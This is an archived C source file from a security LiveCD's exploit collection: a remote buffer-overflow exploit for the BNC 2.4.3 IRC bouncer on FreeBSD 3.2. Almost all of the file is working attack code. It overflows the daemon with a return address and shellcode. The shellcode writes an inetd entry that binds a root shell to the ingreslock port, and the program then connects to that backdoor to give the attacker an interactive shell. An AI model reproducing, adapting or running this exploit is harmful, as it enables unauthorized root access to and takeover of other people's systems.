Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / irc / bnc / fbsd-bnc.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 6KB | 262 lines

/* * BNC 2.4.3 exploit for FreeBSD 3.2-REL * This version of BNC is shipped in the FBSD 3.2-REL ports collection. * * $ ./fbsd-bnc echelon 6669 * [...] * Host `192.168.2.34` successfully owned. * sh: can't access tty; job control turned off * # * * This is *not* the same exploit as in 2.2.* versions of BNC (contrary * to what some outspoken individuals appear to think). * * Thanks to gov-boi for beta-testing the linux version of this exploit. * * - anathema <anathema@hack.co.za> * * Usage: ./fbsd-bnc dst_host|ip [src_prt] dst_prt * eg: ./fbsd-bnc echelon 6669 - dest port of 6669 * eg: ./fbsd-bnc echelon 242 1024 - src port of 242, dest port of 1024 */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/time.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #define ADDR 0x804dd70 /* BNC 2.4.3 : FBSD 3.2-REL */ #define BUFLEN 1019 #define PREPEND_LEN 193 #define DELAY 5 char c0de[] = "\xeb\x3d\x9a\x24\x24\x24\x24\x07\x24\xc3\x5e\x29\xc0\x89\x46\xbf\x88\x46\xc4" "\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x78\x29\xc0\x50\x56\x8d\x5e\x10" "\x89\x1e\x53\x8d\x5e\x18\x89\x5e\x04\x8d\x5e\x1b\x89\x5e\x08\xb0\x3b\xe8\xc6" "\xff\xff\xff\xff\xff\xff\xe8\xc6\xff\xff\xff\x01\x01\x01\x01\x02\x02\x02\x02" "\x03\x03\x03\x03\x04\x04\x04\x04" "\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20" "echo \"ingreslock stream tcp nowait root /bin/sh sh -i\">/tmp/x;" "/usr/sbin/inetd /tmp/x; /bin/rm -f /tmp/x"; u_long resolve_host(u_char *host) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr(host)) == -1) { host_ent = gethostbyname(host); if (!host_ent) return((u_long)0); memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length); } return (addr.s_addr); } void shellz(u_long dst_ip) { struct sockaddr_in sin; u_char sock_buf[8192]; fd_set fds; int sock; sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); } sin.sin_family = AF_INET; sin.sin_port = htons(1524); /* ingreslock */ sin.sin_addr.s_addr = dst_ip; if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("connecting to backdoor"); exit(-1); } fprintf(stderr, "\nHost `%s` successfully owned.\n", inet_ntoa(sin.sin_addr)); for (;;) { FD_ZERO(&fds); FD_SET(0, &fds); FD_SET(sock, &fds); select(255, &fds, NULL, NULL, NULL); memset(sock_buf, 0, sizeof(sock_buf)); if (FD_ISSET(sock, &fds)) { read(sock, sock_buf, sizeof(sock_buf)); fprintf(stderr, "%s", sock_buf); } if (FD_ISSET(0, &fds)) { read(0, sock_buf, sizeof(sock_buf)); write(sock, sock_buf, strlen(sock_buf)); } } /* NOTREACHED */ } int overflow_buf(u_char *buf, int buf_len) { u_long addr = ADDR; int i = 0, j = 0; for (i = 0; i < PREPEND_LEN;) { /* Initial JMP opcodes to be prepended */ buf[i++] = 0xeb; buf[i++] = 0x20; } buf[i++] = 0xeb; buf[i++] = 0xeb; buf[i++] = 0x40; buf[i++] = 0x20; j = i; for (; i < (j + 8);) { /* Second JMP set */ buf[i++] = 0xeb; buf[i++] = 0x20; } /* FreeBSD 3.2-REL: 0x804dd70 */ buf[i++] = (addr & 0x000000ff); buf[i++] = (addr & 0x0000ff00) >> 8; buf[i++] = (addr & 0x00ff0000) >> 16; buf[i++] = (addr & 0xff000000) >> 24; memset(buf + i, 0x90, BUFLEN - strlen(c0de)); memcpy(buf + BUFLEN - strlen(c0de), c0de, strlen(c0de)); memcpy(buf + BUFLEN, "\x00\x90\x20", 3); return(i + BUFLEN + 3); } void exploit(u_long dst_ip, u_short src_prt, u_short dst_prt) { struct sockaddr_in sin; u_char buf[8192] = {0}; int sock, len = 0; sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (sock == -1) { perror("socket allocation"); exit(-1); } if (src_prt) { struct sockaddr_in min; int one = 1, *o_pt = &one; if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, o_pt, sizeof(one)) == -1) { perror("setsockopt SO_REUSEADDR"); exit(-1); } min.sin_family = AF_INET; min.sin_port = htons(src_prt); min.sin_addr.s_addr = INADDR_ANY; if (bind(sock, (struct sockaddr *)&min, sizeof(min)) == -1) { perror("bind"); exit(-1); } } sin.sin_family = AF_INET; sin.sin_port = htons(dst_prt); sin.sin_addr.s_addr = dst_ip; if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) == -1) { perror("connecting to bnc daemon"); exit(-1); } len = overflow_buf(buf, sizeof(buf)); if (write(sock, buf, len) != len) { fprintf(stderr, "err: truncated write()\n"); exit(-1); } sleep(DELAY); shellz(dst_ip); /* NOTREACHED */ } void usage(u_char *nomenclature) { fprintf(stderr, "usage:\t%s dst_host|ip [src_prt] dst_prt\n", nomenclature); exit(0); } int main(int argc, char **argv) { u_long dst_ip = 0; u_short src_prt = 0, dst_prt = 0; fprintf(stderr, "BNC 2.4.3 exploit for FreeBSD 3.2-RELEASE\n" "This version of BNC is shipped in the FBSD 3.2-REL ports collection.\n" "\n- anathema <anathema@hack.co.za>\n\n"); if (argc != 3 && argc != 4) { usage(argv[0]); /* NOTREACHED */ } dst_ip = resolve_host(argv[1]); if (!dst_ip) { fprintf(stderr, "What kind of address is this: `%s`?\n", argv[1]); exit(-1); } if (argc == 3) { dst_prt = (u_short)atoi(argv[2]); } if (argc == 4) { src_prt = (u_short)atoi(argv[2]); dst_prt = (u_short)atoi(argv[3]); } exploit(dst_ip, src_prt, dst_prt); /* NOTREACHED */ }